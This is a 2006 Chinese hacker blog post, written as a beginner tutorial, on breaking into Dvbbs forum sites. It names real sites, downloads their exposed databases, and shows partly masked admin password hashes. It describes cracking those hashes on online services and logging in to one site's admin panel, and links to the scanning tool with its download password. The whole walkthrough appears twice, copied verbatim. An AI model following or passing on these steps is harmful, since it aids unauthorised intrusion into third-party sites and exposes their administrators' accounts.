[原创〕利用Dvbbs动网论坛漏洞来入侵之体验
上一篇 / 下一篇 2006-09-21 11:14:53 / 天气: 晴朗 / 心情: 高兴 / 个人分类:原创文章
大家好,今天来兴趣了就对Dvbbs动网论坛漏洞(这个漏洞好早就有,本人菜鸟遇的也晚,不要见笑)。玩了一下本人菜鸟一个,什么都不知道,刚开始的时候虽说有好多的不懂,但在黑基有的斑竹和好友的帮助下弄清了一些,于是就拿出来与大家一起分享!没有什么技术,高手不要见笑,对于新手来说,一定要看哦!我在写这个文章的之前试了不少,失败了也不少!在实际试的时候会有很多问题出现,对于本人此文章出现的问题我或许还不是很清楚,也请过路的高手指点,谢谢!
我用的工具:动网漏洞大扫描1.0测试版.辅臣数据库浏览器(这些有我的空间都有下载,空间地址:http://free.ys168.com/?yy121密码hackbase)
先用动网漏洞大扫描来扫一下,如图所示:
等一会就有了结果:
于是我就随便找个网站来试吧:
http://www.pa999.cn/dvbbs/|欢迎访问聚一堂论坛[聚一堂论坛] -- Powered ... |大小:8MB,地址:http://www.pa999.cn/dvbbs//data/dvbbs7.mdb|7.1.0 Sp1
用迅雷把数据库下载下来,再用辅臣数据库浏览器打开!
如图:
在那找表,
user:admin
password:469e80d32c0559f8
于是在线解密登陆http://www.md5.org.cn/md5/getpass.asp?info=admin888
得出Result:
这个时候来分析一下,猜一下他的后台入口:
我猜到:http://www.pa999.cn/dvbbs/admin_login.asp
登陆,晕!
错误,不好失败!
再找个网站:http://www.kmt.cn/Dvbbs/index.asp下他的数据库,好的如图:
用辅臣数据库浏览器打开
看到了没有?
有两个管理员的信息,
user:admin
password:469e80d32c055**
user:听雨
password:ded46b36c18****
就用user:听雨
于是到网上去解密:http://www.xmd5.com/index_en.htm
得到密码:
进http://www.kmt.cn/Dvbbs/login.asp
好的,进去了,
如图:
接下来你可以做好多的事情!
不用我说了吧,希望大家不要改后台的密码`不要在里面搞破坏`中国人是不黑中国人的,否则后果自负!
今天我又去看了一下,真可恶,有人在那挂马!
对于这些人,我们嗤之以鼻!
我用的工具:动网漏洞大扫描1.0测试版.辅臣数据库浏览器(这些有我的空间都有下载,空间地址:http://free.ys168.com/?yy121密码hackbase)
先用动网漏洞大扫描来扫一下,如图所示:
等一会就有了结果:
于是我就随便找个网站来试吧:
http://www.pa999.cn/dvbbs/|欢迎访问聚一堂论坛[聚一堂论坛] -- Powered ... |大小:8MB,地址:http://www.pa999.cn/dvbbs//data/dvbbs7.mdb|7.1.0 Sp1
用迅雷把数据库下载下来,再用辅臣数据库浏览器打开!
如图:
在那找表,
user:admin
password:469e80d32c0559f8
于是在线解密登陆http://www.md5.org.cn/md5/getpass.asp?info=admin888
得出Result:
这个时候来分析一下,猜一下他的后台入口:
我猜到:http://www.pa999.cn/dvbbs/admin_login.asp
登陆,晕!
错误,不好失败!
再找个网站:http://www.kmt.cn/Dvbbs/index.asp下他的数据库,好的如图:
用辅臣数据库浏览器打开
看到了没有?
有两个管理员的信息,
user:admin
password:469e80d32c055**
user:听雨
password:ded46b36c18****
就用user:听雨
于是到网上去解密:http://www.xmd5.com/index_en.htm
得到密码:
进http://www.kmt.cn/Dvbbs/login.asp
好的,进去了,
如图:
接下来你可以做好多的事情!
不用我说了吧,希望大家不要改后台的密码`不要在里面搞破坏`中国人是不黑中国人的,否则后果自负!
今天我又去看了一下,真可恶,有人在那挂马!
对于这些人,我们嗤之以鼻!
相关阅读:
- [原创]简单地隐藏你的爱马和账号 (mpf_hgsf, 2006-9-16)
- [原创]网吧游荡记 (mpf_hgsf, 2006-9-16)
- 【黑基原创】简单的邮箱、QQ、word密码破解与防护 (mpf_hgsf, 2006-9-30)
- [转SINA]中毒我帮你 手工恢复EXE文件关联方法介绍 (黑基小白, 2006-10-12)
- [转]内存不能为read或该内存不能为written的解决方案 (黑基小白, 2006-10-12)
- [转]用简单命令 检查电脑是否被安装木马 (黑基小白, 2006-10-12)
- 旁注WEB综合检测程序Ver3.6专用版 (弈宇风尘, 2006-10-12)
- [SINA]不再崩溃 如何清除操作系统中的伪装服务 (黑基小白, 2006-10-12)
- [转]ADSL拨号中出现的错误代码 (黑基小白, 2006-10-12)
- [SINA]木马程序和病毒清除的通用解法 (黑基小白, 2006-10-12)
导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报
